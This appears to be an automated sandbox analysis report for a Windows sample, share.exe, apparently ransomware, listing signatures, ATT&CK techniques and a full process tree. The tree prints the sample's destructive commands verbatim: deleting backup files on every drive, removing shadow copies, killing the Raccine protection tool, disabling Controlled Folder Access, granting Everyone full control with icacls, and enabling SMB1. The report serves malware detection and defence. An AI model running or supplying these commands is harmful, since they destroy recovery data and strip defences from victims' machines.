9c684dc8aead69cdb480d8b048da597d9541d527ec4e9ad5371c449409d5ef17

Analysis

max time kernel
87s
max time network
160s
platform
windows10_x64
resource
win10v20210410
submitted
04/06/2021, 16:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

share.exe
Size

170KB
MD5

108d4532a263fca754b85d942bd55451
SHA1

202a1bf5238322372d1da89850a61c4c050a9edd
SHA256

b010e408ad75f379646832fa83567596c7918be1a54b80fc2b4207c33e57057d
SHA512

72735b3c1c03f7cf0462e59d231bddc8490f26a47690b5ca408313a633f9570d9aa140194439ec997d2e5638eae350bb1b9095857d9bd467e8488efbdd27638a

Score

8^/10

discovery evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4196	icacls.exe
2808	icacls.exe
4796	icacls.exe

Enumerates connected drives 3 TTPs 3 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	mountvol.exe
File opened (read-only)	\??\A:	mountvol.exe
File opened (read-only)	\??\B:	mountvol.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2848	3992	WerFault.exe	29

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
4908	net.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2372	taskkill.exe
2088	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
4056	powershell.exe
3992	share.exe
3992	share.exe
3992	share.exe
4056	powershell.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
4056	powershell.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
4468	powershell.exe
3992	share.exe
3992	share.exe
3992	share.exe
4468	powershell.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
4468	powershell.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe
3992	share.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeDebugPrivilege	3992	share.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	2372	taskkill.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeBackupPrivilege	4332	vssvc.exe
Token: SeRestorePrivilege	4332	vssvc.exe
Token: SeAuditPrivilege	4332	vssvc.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeIncreaseQuotaPrivilege	4056	powershell.exe
Token: SeSecurityPrivilege	4056	powershell.exe
Token: SeTakeOwnershipPrivilege	4056	powershell.exe
Token: SeLoadDriverPrivilege	4056	powershell.exe
Token: SeSystemProfilePrivilege	4056	powershell.exe
Token: SeSystemtimePrivilege	4056	powershell.exe
Token: SeProfSingleProcessPrivilege	4056	powershell.exe
Token: SeIncBasePriorityPrivilege	4056	powershell.exe
Token: SeCreatePagefilePrivilege	4056	powershell.exe
Token: SeBackupPrivilege	4056	powershell.exe
Token: SeRestorePrivilege	4056	powershell.exe
Token: SeShutdownPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeSystemEnvironmentPrivilege	4056	powershell.exe
Token: SeRemoteShutdownPrivilege	4056	powershell.exe
Token: SeUndockPrivilege	4056	powershell.exe
Token: SeManageVolumePrivilege	4056	powershell.exe
Token: 33	4056	powershell.exe
Token: 34	4056	powershell.exe
Token: 35	4056	powershell.exe
Token: 36	4056	powershell.exe
Token: SeDebugPrivilege	4368	powershell.exe
Token: SeRestorePrivilege	2848	WerFault.exe
Token: SeBackupPrivilege	2848	WerFault.exe
Token: SeDebugPrivilege	2848	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3992 wrote to memory of 3300	3992	share.exe	80
PID 3992 wrote to memory of 3300	3992	share.exe	80
PID 3992 wrote to memory of 3300	3992	share.exe	80
PID 3300 wrote to memory of 3492	3300	csc.exe	81
PID 3300 wrote to memory of 3492	3300	csc.exe	81
PID 3300 wrote to memory of 3492	3300	csc.exe	81
PID 3992 wrote to memory of 2088	3992	share.exe	83
PID 3992 wrote to memory of 2088	3992	share.exe	83
PID 3992 wrote to memory of 2088	3992	share.exe	83
PID 3992 wrote to memory of 2372	3992	share.exe	85
PID 3992 wrote to memory of 2372	3992	share.exe	85
PID 3992 wrote to memory of 2372	3992	share.exe	85
PID 3992 wrote to memory of 3808	3992	share.exe	87
PID 3992 wrote to memory of 3808	3992	share.exe	87
PID 3992 wrote to memory of 3808	3992	share.exe	87
PID 3992 wrote to memory of 2212	3992	share.exe	110
PID 3992 wrote to memory of 2212	3992	share.exe	110
PID 3992 wrote to memory of 2212	3992	share.exe	110
PID 3992 wrote to memory of 2188	3992	share.exe	109
PID 3992 wrote to memory of 2188	3992	share.exe	109
PID 3992 wrote to memory of 2188	3992	share.exe	109
PID 3992 wrote to memory of 932	3992	share.exe	90
PID 3992 wrote to memory of 932	3992	share.exe	90
PID 3992 wrote to memory of 932	3992	share.exe	90
PID 3992 wrote to memory of 1108	3992	share.exe	89
PID 3992 wrote to memory of 1108	3992	share.exe	89
PID 3992 wrote to memory of 1108	3992	share.exe	89
PID 3992 wrote to memory of 1444	3992	share.exe	99
PID 3992 wrote to memory of 1444	3992	share.exe	99
PID 3992 wrote to memory of 1444	3992	share.exe	99
PID 3992 wrote to memory of 2060	3992	share.exe	94
PID 3992 wrote to memory of 2060	3992	share.exe	94
PID 3992 wrote to memory of 2060	3992	share.exe	94
PID 3992 wrote to memory of 3172	3992	share.exe	95
PID 3992 wrote to memory of 3172	3992	share.exe	95
PID 3992 wrote to memory of 3172	3992	share.exe	95
PID 3992 wrote to memory of 1432	3992	share.exe	101
PID 3992 wrote to memory of 1432	3992	share.exe	101
PID 3992 wrote to memory of 1432	3992	share.exe	101
PID 3992 wrote to memory of 3296	3992	share.exe	100
PID 3992 wrote to memory of 3296	3992	share.exe	100
PID 3992 wrote to memory of 3296	3992	share.exe	100
PID 3992 wrote to memory of 4064	3992	share.exe	104
PID 3992 wrote to memory of 4064	3992	share.exe	104
PID 3992 wrote to memory of 4064	3992	share.exe	104
PID 3992 wrote to memory of 4056	3992	share.exe	107
PID 3992 wrote to memory of 4056	3992	share.exe	107
PID 3992 wrote to memory of 4056	3992	share.exe	107
PID 3992 wrote to memory of 844	3992	share.exe	111
PID 3992 wrote to memory of 844	3992	share.exe	111
PID 3992 wrote to memory of 844	3992	share.exe	111
PID 3992 wrote to memory of 4468	3992	share.exe	116
PID 3992 wrote to memory of 4468	3992	share.exe	116
PID 3992 wrote to memory of 4468	3992	share.exe	116
PID 3992 wrote to memory of 4888	3992	share.exe	119
PID 3992 wrote to memory of 4888	3992	share.exe	119
PID 3992 wrote to memory of 4888	3992	share.exe	119
PID 3992 wrote to memory of 4916	3992	share.exe	120
PID 3992 wrote to memory of 4916	3992	share.exe	120
PID 3992 wrote to memory of 4916	3992	share.exe	120
PID 3992 wrote to memory of 4964	3992	share.exe	122
PID 3992 wrote to memory of 4964	3992	share.exe	122
PID 3992 wrote to memory of 4964	3992	share.exe	122
PID 3992 wrote to memory of 4984	3992	share.exe	124

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	share.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	share.exe

C:\Users\Admin\AppData\Local\Temp\share.exe
"C:\Users\Admin\AppData\Local\Temp\share.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3992
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dqn4ct3f\dqn4ct3f.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDFF.tmp" "c:\Users\Admin\AppData\Local\Temp\dqn4ct3f\CSCC5EA8B3F1BA54B2FA6CA1A807C431ABB.TMP"
    3⤵
    PID:3492
- C:\Windows\SysWOW64\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Raccine.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2088
- C:\Windows\SysWOW64\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2372
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:3808
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
  2⤵
  PID:1108
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
  2⤵
  PID:932
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
  2⤵
  PID:2060
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
  2⤵
  PID:3172
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1444
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
  2⤵
  PID:3296
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1432
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4064
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-CimInstance Win32_ShadowCopy | Remove-CimInstance
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4056
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:2188
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
  2⤵
  PID:2212
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config MBAMService start= disabled
  2⤵
  PID:844
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4468
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:4888
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:4916
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config Dnscache start= auto
  2⤵
  PID:4964
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config upnphost start= auto
  2⤵
  PID:5004
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config FDResPub start= auto
  2⤵
  PID:4984
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config SSDPSRV start= auto
  2⤵
  PID:5108
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" config fdPHost start= auto
  2⤵
  PID:5092
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="Network Discovery" new enable=Yes
  2⤵
  PID:2464
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:2960
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:4368
- C:\Windows\SysWOW64\mountvol.exe
  "mountvol.exe"
  2⤵
  PID:248
- C:\Windows\SysWOW64\mountvol.exe
  "C:\Windows\System32\mountvol.exe" A: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
  2⤵
  - Enumerates connected drives
  PID:4568
- C:\Windows\SysWOW64\mountvol.exe
  "C:\Windows\System32\mountvol.exe" B: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
  2⤵
  - Enumerates connected drives
  PID:4624
- C:\Windows\SysWOW64\mountvol.exe
  "C:\Windows\System32\mountvol.exe" E: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
  2⤵
  - Enumerates connected drives
  PID:4692
- C:\Windows\SysWOW64\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4796
- C:\Windows\SysWOW64\icacls.exe
  "C:\Windows\System32\icacls.exe" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4196
- C:\Windows\SysWOW64\icacls.exe
  "C:\Windows\System32\icacls.exe" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2808
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:732
- C:\Windows\SysWOW64\net.exe
  "net.exe" view
  2⤵
  - Discovers systems in the same network
  PID:4908
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 2328
  2⤵
  - Program crash
  - Suspicious use of AdjustPrivilegeToken
  PID:2848

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4332

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s fdPHost
1⤵
PID:3024

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:1548

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:4156

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3992-213-0x0000000005F54000-0x0000000005F57000-memory.dmp

Filesize
12KB

Download
memory/3992-237-0x000000000515D000-0x000000000515E000-memory.dmp

Filesize
4KB

Download
memory/3992-149-0x0000000005156000-0x0000000005157000-memory.dmp

Filesize
4KB

Download
memory/3992-254-0x0000000005154000-0x0000000005155000-memory.dmp

Filesize
4KB

Download
memory/3992-150-0x0000000005157000-0x0000000005158000-memory.dmp

Filesize
4KB

Download
memory/3992-117-0x0000000005150000-0x0000000005151000-memory.dmp

Filesize
4KB

Download
memory/3992-151-0x0000000005158000-0x0000000005159000-memory.dmp

Filesize
4KB

Download
memory/3992-152-0x0000000005159000-0x000000000515F000-memory.dmp

Filesize
24KB

Download
memory/3992-125-0x0000000005180000-0x0000000005181000-memory.dmp

Filesize
4KB

Download
memory/3992-255-0x0000000005F51000-0x0000000005F62000-memory.dmp

Filesize
68KB

Download
memory/3992-258-0x0000000005158000-0x000000000515E000-memory.dmp

Filesize
24KB

Download
memory/3992-126-0x0000000005190000-0x00000000051AC000-memory.dmp

Filesize
112KB

Download
memory/3992-242-0x0000000005F51000-0x0000000005F5E000-memory.dmp

Filesize
52KB

Download
memory/3992-130-0x0000000005153000-0x0000000005155000-memory.dmp

Filesize
8KB

Download
memory/3992-239-0x0000000005F67000-0x0000000005F68000-memory.dmp

Filesize
4KB

Download
memory/3992-240-0x0000000005F51000-0x0000000005F58000-memory.dmp

Filesize
28KB

Download
memory/3992-131-0x0000000005155000-0x0000000005156000-memory.dmp

Filesize
4KB

Download
memory/3992-263-0x000000000515C000-0x000000000515E000-memory.dmp

Filesize
8KB

Download
memory/3992-236-0x0000000005154000-0x0000000005155000-memory.dmp

Filesize
4KB

Download
memory/3992-235-0x0000000005F64000-0x0000000005F69000-memory.dmp

Filesize
20KB

Download
memory/3992-233-0x0000000005159000-0x000000000515E000-memory.dmp

Filesize
20KB

Download
memory/3992-190-0x0000000005F50000-0x0000000005F54000-memory.dmp

Filesize
16KB

Download
memory/3992-234-0x0000000005F5F000-0x0000000005F64000-memory.dmp

Filesize
20KB

Download
memory/3992-232-0x0000000005F53000-0x0000000005F58000-memory.dmp

Filesize
20KB

Download
memory/3992-215-0x0000000005F5A000-0x0000000005F5F000-memory.dmp

Filesize
20KB

Download
memory/3992-114-0x0000000000540000-0x0000000000541000-memory.dmp

Filesize
4KB

Download
memory/3992-216-0x0000000005F57000-0x0000000005F5A000-memory.dmp

Filesize
12KB

Download
memory/3992-231-0x0000000005F5D000-0x0000000005F5E000-memory.dmp

Filesize
4KB

Download
memory/3992-230-0x0000000005154000-0x0000000005155000-memory.dmp

Filesize
4KB

Download
memory/3992-261-0x0000000005154000-0x0000000005155000-memory.dmp

Filesize
4KB

Download
memory/3992-116-0x0000000004D20000-0x0000000004D21000-memory.dmp

Filesize
4KB

Download
memory/3992-262-0x0000000005158000-0x0000000005159000-memory.dmp

Filesize
4KB

Download
memory/3992-132-0x00000000055D0000-0x00000000055D1000-memory.dmp

Filesize
4KB

Download
memory/3992-265-0x0000000005F5B000-0x0000000005F62000-memory.dmp

Filesize
28KB

Download
memory/3992-264-0x0000000005F51000-0x0000000005F56000-memory.dmp

Filesize
20KB

Download
memory/4056-220-0x0000000006C96000-0x0000000006C98000-memory.dmp

Filesize
8KB

Download
memory/4056-160-0x0000000008420000-0x0000000008421000-memory.dmp

Filesize
4KB

Download
memory/4056-148-0x00000000072D0000-0x00000000072D1000-memory.dmp

Filesize
4KB

Download
memory/4056-147-0x00000000012A0000-0x00000000012A1000-memory.dmp

Filesize
4KB

Download
memory/4056-153-0x0000000006C90000-0x0000000006C91000-memory.dmp

Filesize
4KB

Download
memory/4056-154-0x0000000006C92000-0x0000000006C93000-memory.dmp

Filesize
4KB

Download
memory/4056-217-0x0000000006C93000-0x0000000006C94000-memory.dmp

Filesize
4KB

Download
memory/4056-197-0x0000000009000000-0x0000000009001000-memory.dmp

Filesize
4KB

Download
memory/4056-192-0x0000000006D80000-0x0000000006D81000-memory.dmp

Filesize
4KB

Download
memory/4056-188-0x000000007EF00000-0x000000007EF01000-memory.dmp

Filesize
4KB

Download
memory/4056-182-0x0000000008FC0000-0x0000000008FF3000-memory.dmp

Filesize
204KB

Download
memory/4056-155-0x0000000007170000-0x0000000007171000-memory.dmp

Filesize
4KB

Download
memory/4056-156-0x0000000007A70000-0x0000000007A71000-memory.dmp

Filesize
4KB

Download
memory/4056-161-0x00000000081F0000-0x00000000081F1000-memory.dmp

Filesize
4KB

Download
memory/4056-158-0x0000000007BC0000-0x0000000007BC1000-memory.dmp

Filesize
4KB

Download
memory/4056-159-0x0000000007290000-0x0000000007291000-memory.dmp

Filesize
4KB

Download
memory/4368-253-0x0000000000D92000-0x0000000000D93000-memory.dmp

Filesize
4KB

Download
memory/4368-259-0x000000007EDE0000-0x000000007EDE1000-memory.dmp

Filesize
4KB

Download
memory/4368-260-0x0000000000D93000-0x0000000000D94000-memory.dmp

Filesize
4KB

Download
memory/4368-252-0x0000000000D90000-0x0000000000D91000-memory.dmp

Filesize
4KB

Download
memory/4468-174-0x00000000012A2000-0x00000000012A3000-memory.dmp

Filesize
4KB

Download
memory/4468-173-0x00000000012A0000-0x00000000012A1000-memory.dmp

Filesize
4KB

Download
memory/4468-218-0x000000007F680000-0x000000007F681000-memory.dmp

Filesize
4KB

Download
memory/4468-219-0x00000000012A3000-0x00000000012A4000-memory.dmp

Filesize
4KB

Download